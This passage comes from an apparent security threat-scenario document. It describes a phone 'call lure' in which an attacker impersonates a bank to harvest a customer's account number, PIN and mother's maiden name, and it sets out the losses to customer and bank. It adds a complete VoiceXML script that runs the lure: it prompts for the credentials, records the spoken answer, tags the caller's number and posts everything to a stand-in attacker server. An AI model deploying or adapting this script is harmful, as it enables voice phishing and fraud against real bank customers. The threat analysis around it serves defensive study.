5.2 Call Lure

Alice is a customer of BobBank. Mallet is an attacker attempting to obtain Alice's access credentials for the BobBank site by impersonating BobBank over the phone.

Mallet places an outbound call to Alice (and to hundreds of other users). The caller ID presented to Alice appears to be a legitimate 800 number. The voice service introduces itself as BobBank and tells Alice that, for fraud verification purposes, it needs to ask her a series of questions. The call then says, "For verification purposes, please enter your account number and numeric PIN." For further verification, it asks Alice to state her mother's maiden name. Finally, the system asks for non-identifying details whose only purpose is to make the call sound like a genuine fraud check, such as "Is your checkbook in your possession?", "Please state the date of your last ATM transaction." and "Please enter the amount of your last ATM transaction." The call concludes by saying "Thank you, your account appears to be in good standing at this time. Goodbye."

At the beginning of the call Mallet also gives an 800 number that Alice can call back when it is convenient. That number is operated by Mallet and runs the same script, so a cautious user who hangs up and "verifies" by calling back is lured just the same.
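The lure above needs nothing beyond standard VoiceXML 2.0 features: built-in DTMF grammars collect the account number and PIN, a record element captures the spoken maiden name, and a submit element posts everything to Mallet's server. The document below is an added illustration of the scenario, not code from the original page; the collection URL, the form and field names, and the use of session.connection.remote.uri to tag each submission with the victim's number are assumptions made for the example.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Added example: the Call Lure dialog expressed as a VoiceXML 2.0 document.
     The target URL and variable names are hypothetical. -->
<vxml version="2.0" xmlns="http://www.w3.org/2001/vxml">
  <form id="verify">
    <!-- Caller's number as seen by the platform (session variable, VoiceXML 2.0 sec. 5.1.4);
         lets the attacker match an inbound call-back to the number that was dialled. -->
    <var name="caller" expr="session.connection.remote.uri"/>

    <block>
      <prompt>
        This is BobBank. For fraud verification purposes we need to ask you a series of questions.
        If this is not a convenient time, you may call us back at 1 800 555 0100.
      </prompt>
    </block>

    <!-- Built-in digits grammar: the account number arrives as a DTMF string. -->
    <field name="account" type="digits">
      <prompt>For verification purposes, please enter your account number.</prompt>
    </field>

    <!-- Built-in digits grammar constrained to a four-digit PIN. -->
    <field name="pin" type="digits?length=4">
      <prompt>Please enter your numeric PIN.</prompt>
    </field>

    <!-- Spoken answer is recorded as audio; no speech recognition is required. -->
    <record name="maiden" beep="true" maxtime="10s" dtmfterm="true">
      <prompt>For further verification, please state your mother's maiden name.</prompt>
    </record>

    <!-- Low-sensitivity questions that only serve to make the call sound legitimate. -->
    <field name="checkbook" type="boolean">
      <prompt>Is your checkbook in your possession?</prompt>
    </field>
    <field name="lastAmount" type="currency">
      <prompt>Please enter the amount of your last A T M transaction.</prompt>
    </field>

    <block>
      <prompt>Thank you, your account appears to be in good standing at this time. Goodbye.</prompt>
      <!-- Everything collected is posted to the attacker's server in one request.
           multipart/form-data is needed because the recording is binary audio. -->
      <submit next="https://collector.example/lure"
              method="post"
              enctype="multipart/form-data"
              namelist="caller account pin maiden checkbook lastAmount"/>
    </block>
  </form>
</vxml>
```

The same document can serve both the outbound campaign and the call-back number: on the call-back leg, session.connection.remote.uri identifies which dialled number returned the call.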

Both Alice and BobBank have assets at risk. Alice's personal information has been disclosed, and her account may be compromised as well. Beyond direct losses due to fraud, BobBank may suffer indirect losses whether or not the attack succeeds: the cost of reissuing account numbers, PINs and checkbooks to Alice, and an increased customer service load, since Alice may call customer service to ask about the attack or insist on doing all her future transactions at a local branch, at significantly higher cost to the bank.

For additional references, see http://www.cknow.com/news/security/PhoneSpoofingAddedtoPhish.html

[1] VoiceXML 2.0 Standard Session Variables /TR/voicexml20/#dml5.1.4